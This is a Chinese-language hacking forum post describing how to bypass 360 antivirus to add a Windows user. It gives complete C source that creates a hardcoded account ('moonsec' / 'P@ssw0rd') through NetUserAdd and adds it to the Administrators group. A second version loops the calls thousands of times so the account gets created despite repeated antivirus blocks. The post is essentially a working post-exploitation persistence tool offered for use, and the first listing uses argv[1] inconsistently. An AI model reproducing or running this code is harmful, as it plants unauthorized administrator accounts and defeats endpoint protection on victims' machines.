绕过360杀软添加用户

月师傅

绕过360杀软添加用户

一、前言

正常执行添加命令 net user moonsec /add 拦截

二、代码

准备添加用户的代码

1. #define _CRT_SECURE_NO_WARNINGS
   
2. #ifndef UNICODE
   
3. #define UNICODE
   
4. #endif
   
5. #pragma comment(lib, "netapi32.lib")
   
6. 
   
7. #include <stdio.h>
   
8. #include <windows.h>
   
9. #include <lm.h>
   
10. 
    
11. int wmain(int argc, wchar_t* argv[])
    
12. {
    
13.     USER_INFO_1 ui;
    
14.     DWORD dwLevel = 1;
    
15.     DWORD dwError = 0;
    
16.     NET_API_STATUS nStatus;
    
17. 
    
18.     wchar_t username[256] = L"moonsec";
    
19.     wchar_t password[256] = L"P@ssw0rd";
    
20. 
    
21.     ui.usri1_name = username;
    
22.     ui.usri1_password = password;
    
23.     ui.usri1_priv = USER_PRIV_USER;
    
24.     ui.usri1_home_dir = NULL;
    
25.     ui.usri1_comment = NULL;
    
26.     ui.usri1_flags = UF_SCRIPT;
    
27.     ui.usri1_script_path = NULL;
    
28. 
    
29.     nStatus = NetUserAdd(NULL,
    
30.         dwLevel,
    
31.         (LPBYTE)&ui,
    
32.         &dwError);
    
33. 
    
34.     if (nStatus == NERR_Success)
    
35.         fwprintf(stderr, L"User %s has been successfully added\n", argv[1]);
    
36. 
    
37.     else
    
38.         fprintf(stderr, "A system error has occurred: %d\n", nStatus);
    
39. 
    
40.     LOCALGROUP_MEMBERS_INFO_3 account;
    
41.     account.lgrmi3_domainandname = argv[1];
    
42. 
    
43.     NET_API_STATUS Status = NetLocalGroupAddMembers(NULL, L"Administrators", 3, (LPBYTE)&account, 1);
    
44. 
    
45.     if (Status == NERR_Success || Status == ERROR_MEMBER_IN_ALIAS) {
    
46.         printf("Administrators added Successfully!");
    
47.     }
    
48.     else {
    
49.         printf("Administrators added Failed!");
    
50.     }
    
51.     return 0;
    
52. }

复制代码

这段代码编译的文件 执行还是会拦截的

可以添加for循环让程序一直添加用户。360有时候会拦截失效

代码

1. #define _CRT_SECURE_NO_WARNINGS
   
2. #ifndef UNICODE
   
3. #define UNICODE
   
4. #endif
   
5. #pragma comment(lib, "netapi32.lib")
   
6. 
   
7. #include <stdio.h>
   
8. #include <windows.h>
   
9. #include <lm.h>
   
10. 
    
11. int wmain(int argc, wchar_t* argv[])
    
12. {
    
13.     USER_INFO_1 ui;
    
14.     DWORD dwLevel = 1;
    
15.     DWORD dwError = 0;
    
16.     NET_API_STATUS nStatus;
    
17. 
    
18.     wchar_t username[256] = L"moonsec";
    
19.     wchar_t password[256] = L"P@ssw0rd";
    
20. 
    
21.     ui.usri1_name = username;
    
22.     ui.usri1_password = password;
    
23.     ui.usri1_priv = USER_PRIV_USER;
    
24.     ui.usri1_home_dir = NULL;
    
25.     ui.usri1_comment = NULL;
    
26.     ui.usri1_flags = UF_SCRIPT;
    
27.     ui.usri1_script_path = NULL;
    
28.     for (size_t i = 0; i < 9999; i++)
    
29.     {
    
30.         nStatus = NetUserAdd(NULL,
    
31.             dwLevel,
    
32.             (LPBYTE)&ui,
    
33.             &dwError);
    
34. 
    
35. 
    
36. 
    
37.         for (size_t i = 0; i < 9999; i++)
    
38.         {
    
39.             nStatus = NetUserAdd(NULL,
    
40.                 dwLevel,
    
41.                 (LPBYTE)&ui,
    
42.                 &dwError);
    
43. 
    
44.             if (nStatus == NERR_Success)
    
45.                 fwprintf(stderr, L"User %s has been successfully added\n", ui.usri1_name);
    
46. 
    
47.             else
    
48.                 fprintf(stderr, "error has occurred: %d\n", nStatus);
    
49. 
    
50. 
    
51.             LOCALGROUP_MEMBERS_INFO_3 account;
    
52.             account.lgrmi3_domainandname = ui.usri1_name;
    
53. 
    
54.             NET_API_STATUS Status = NetLocalGroupAddMembers(NULL, L"Administrators", 3, (LPBYTE)&account, 1);
    
55.         }
    
56.       
    
57. 
    
58.     }
    
59.     return 0;
    
60. }

复制代码

终端上运行 360会产生大量拦截，但是还是会添加用户

源码下载